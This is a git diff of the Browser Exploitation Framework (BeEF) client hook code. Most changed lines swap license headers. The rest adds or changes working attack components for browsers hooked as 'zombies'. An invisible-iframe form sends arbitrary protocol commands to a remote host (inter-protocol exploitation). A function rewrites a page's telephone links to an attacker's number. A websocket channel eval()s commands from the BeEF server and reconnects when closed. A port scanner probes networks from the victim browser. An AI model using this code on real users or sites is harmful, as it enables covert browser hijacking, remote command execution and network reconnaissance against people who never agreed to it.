// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.browser.cookie
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
*
*/
beef.browser.cookie = {
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
hasSessionCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
hasPersistentCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.browser.cookie
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://techpatterns.com/downloads/javascript_cookies.php
* Original author unknown.
*
*/
beef.browser.cookie = {
setCookie: function (name, value, expires, path, domain, secure)
{
var today = new Date();
today.setTime( today.getTime() );
if ( expires )
{
expires = expires * 1000 * 60 * 60 * 24;
}
var expires_date = new Date( today.getTime() + (expires) );
document.cookie = name + "=" +escape( value ) +
( ( expires ) ? ";expires=" + expires_date.toGMTString() : "" ) +
( ( path ) ? ";path=" + path : "" ) +
( ( domain ) ? ";domain=" + domain : "" ) +
( ( secure ) ? ";secure" : "" );
},
getCookie: function(name)
{
var a_all_cookies = document.cookie.split( ';' );
var a_temp_cookie = '';
var cookie_name = '';
var cookie_value = '';
var b_cookie_found = false;
for ( i = 0; i < a_all_cookies.length; i++ )
{
a_temp_cookie = a_all_cookies[i].split( '=' );
cookie_name = a_temp_cookie[0].replace(/^\s+|\s+$/g, '');
if ( cookie_name == name )
{
b_cookie_found = true;
if ( a_temp_cookie.length > 1 )
{
cookie_value = unescape( a_temp_cookie[1].replace(/^\s+|\s+$/g, '') );
}
return cookie_value;
break;
}
a_temp_cookie = null;
cookie_name = '';
}
if ( !b_cookie_found )
{
return null;
}
},
deleteCookie: function (name, path, domain)
{
if ( this.getCookie(name) ) document.cookie = name + "=" +
( ( path ) ? ";path=" + path : "") +
( ( domain ) ? ";domain=" + domain : "" ) +
";expires=Thu, 01-Jan-1970 00:00:01 GMT";
},
hasSessionCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', '', '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
},
hasPersistentCookies: function (name)
{
var name = name || "cookie";
if (name == "") name = "cookie";
this.setCookie( name, 'none', 1, '/', '', '' );
cookiesEnabled = (this.getCookie(name) == null)? false:true;
this.deleteCookie(name, '/', '');
return cookiesEnabled;
}
};
beef.regCmp('beef.browser.cookie');

67
core/main/client/browser/popup.js
View File

@@ -1,39 +1,30 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.browser.popup
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
*
*/
beef.browser.popup = {
blocker_enbabled: function ()
{
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.browser.popup
*
* Provides fuctions for working with cookies.
* Several functions adopted from http://davidwalsh.name/popup-block-javascript
* Original author unknown.
*
*/
beef.browser.popup = {
blocker_enabled: function ()
{
screenParams = beef.browser.getScreenSize();
var popUp = window.open('/', 'windowName0', 'width=1, height=1, left='+screenParams.width+', top='+screenParams.height+', scrollbars, resizable');
if (popUp == null || typeof(popUp)=='undefined') {
return true;
} else {
popUp.close();
return false;
}
}
};
beef.regCmp('beef.browser.popup');

66
core/main/client/dom.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.dom
*
@@ -194,6 +185,31 @@ beef.dom = {
return count;
},
/**
* Parse all links in the page matched by the selector, replacing all telephone urls ('tel' protocol handler) with a new telephone number
* @param: {String} new_number: the new link telephone number to be written
* @param: {String} selector: the jquery selector statement to use, defaults to all a tags.
* @return: {Number} the amount of links found in the DOM and rewritten.
*/
rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @params: {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
@@ -315,6 +331,30 @@ beef.dom = {
formXsrf.submit();
return iframeXsrf;
},
/**
* Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
* @params: {String} rhost: remote host ip/domain
* @params: {String} rport: remote port
* @params: {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+'/index.html');
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
input = document.createElement('textarea');
input.setAttribute('name', Math.random().toString(36).substring(5));
input.value = commands;
formIpec.appendChild(input);
iframeIpec.contentWindow.document.body.appendChild(formIpec);
formIpec.submit();
return iframeIpec;
}
};

17
core/main/client/encode/base64.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
beef.encode = {};

17
core/main/client/encode/json.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
beef.encode.json = {

17
core/main/client/geolocation.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.geolocation
*

17
core/main/client/hardware.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.hardware = {
ua: navigator.userAgent,

17
core/main/client/init.js
View File

@@ -1,19 +1,10 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// if beef.pageIsLoaded is true, then this JS has been loaded >1 times
// and will have a new session id. The new session id will need to know
// the brwoser details. So sendback the browser details again.

17
core/main/client/lib/evercookie.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
* evercookie 0.4 (10/13/2010) -- extremely persistent cookies
*

17
core/main/client/logger.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.logger
*

17
core/main/client/mitb.js
View File

@@ -1,19 +1,10 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.mitb = {
cid:null,

17
core/main/client/net.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net
*

17
core/main/client/net/dns.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.dns
*

17
core/main/client/net/local.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.local
*

117
core/main/client/net/portscanner.js
View File

@@ -1,63 +1,54 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
/*!
* @literal object: beef.net.portscanner
*
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
*/
beef.net.portscanner = {
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.portscanner
*
* Provides port scanning functions for the zombie. A mod of pdp's scanner
*
* Version: '0.1',
* author: 'Petko Petkov',
* homepage: 'http://www.gnucitizen.org'
*/
beef.net.portscanner = {
scanPort: function(callback, target, port, timeout)
{
var timeout = (timeout == null)?100:timeout;
var img = new Image();
img.onerror = function () {
if (!img) return;
img = undefined;
callback(target, port, 'open');
};
img.onload = img.onerror;
img.src = 'http://' + target + ':' + port;
setTimeout(function () {
if (!img) return;
img = undefined;
callback(target, port, 'closed');
}, timeout);
},
scanTarget: function(callback, target, ports_str, timeout)
{
var ports = ports_str.split(",");
for (index = 0; index < ports.length; index++) {
this.scanPort(callback, target, ports[index], timeout);
};
}
};
beef.regCmp('beef.net.portscanner');

17
core/main/client/net/requester.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.net.requester
*

17
core/main/client/os.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.os = {
ua: navigator.userAgent,

17
core/main/client/session.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @literal object: beef.session
*

17
core/main/client/timeout.js Normal file
View File

@@ -0,0 +1,17 @@
//
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*
Sometimes there are timing issues and looks like beef_init
is not called at all (always in cross-domain situations,
for example calling the hook with jquery getScript,
or sometimes with event handler injections).
To fix this, we call again beef_init after 1 second.
Cheers to John Wilander that discussed this bug with me at OWASP AppSec Research Greece
antisnatchor
*/
setTimeout(beef_init, 1000);

17
core/main/client/updater.js
View File

@@ -1,18 +1,9 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/*!
* @Literal object: beef.updater
*

48
core/main/client/websocket.js
View File

@@ -1,19 +1,10 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
//beef.websocket.socket.send(take answer to server beef)
/*New browser init call this */
@@ -27,15 +18,18 @@ beef.websocket = {
var webSocketPort = <%= @websocket_port %>;
var webSocketSecure = <%= @websocket_secure %>;
var protocol = "ws://";
if(webSocketSecure)
//console.log("We are inside init");
/*use wss only if hooked domain is under https. Mixed-content in WS is quite different from a non-WS context*/
if(webSocketSecure && window.location.protocol=="https:"){
protocol = "wss://";
webSocketPort= <%= @websocket_sec_port %>;
}
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
if (beef.browser.isFF() && !!window.MozWebSocket) {
beef.websocket.socket = new MozWebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
} else {
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
beef.websocket.socket = new WebSocket(protocol + webSocketServer + ":" + webSocketPort + "/");
}
},
@@ -43,10 +37,10 @@ beef.websocket = {
start:function () {
new beef.websocket.init();
this.socket.onopen = function () {
//console.log("Socket has been opened!");
//console.log("Socket has been opened!");
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
/*send browser id*/
beef.websocket.send('{"cookie":"' + beef.session.get_hook_session_id() + '"}');
//console.log("Connected and Helo");
beef.websocket.alive();
}
@@ -55,11 +49,21 @@ beef.websocket = {
eval(message.data);
}
this.socket.onclose = function () {
setTimeout(function(){beef.websocket.start()}, 5000);
}
},
send:function (data) {
try {
this.socket.send(data);
// console.log("Sent [" + data + "]");
//console.log("Sent [" + data + "]");
}
catch(err){
//console.log(err);
}
},
alive: function (){

16
core/main/command.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/configuration.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

38
core/main/console/banners.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core
@@ -40,12 +30,13 @@ module Banners
def print_welcome_msg
config = BeEF::Core::Configuration.instance
version = config.get('beef.version')
print_info "Browser Exploitation Framework (BeEF)"
data = "Version #{version}\n"
data += "Website http://beefproject.com\n"
data += "Run 'beef -h' for basic help.\n"
data += "Run 'git pull' to update to the latest revision."
print_info "Browser Exploitation Framework (BeEF) #{version}"
data = "Twit: @beefproject\n"
data += "Site: http://beefproject.com\n"
data += "Blog: http://blog.beefproject.com\n"
data += "Wiki: https://github.com/beefproject/beef/wiki\n"
print_more data
print_info "Project Creator: " + "Wade Alcorn".red + " (@WadeAlcorn)"
end
#
@@ -106,13 +97,12 @@ module Banners
#
def print_loaded_extensions
extensions = BeEF::Extensions.get_loaded
print_info "#{extensions.size} extensions loaded:"
print_info "#{extensions.size} extensions enabled."
output = ''
extensions.each do |key,ext|
output += "#{ext['name']}\n"
end
#extensions.each do |key,ext|
# output += "#{ext['name']}\n"
#end
print_more output
end

16
core/main/console/commandline.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF
module Core

16
core/main/constants/browsers.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
module BeEF

16
core/main/constants/commandmodule.rb
View File

@@ -1,17 +1,7 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
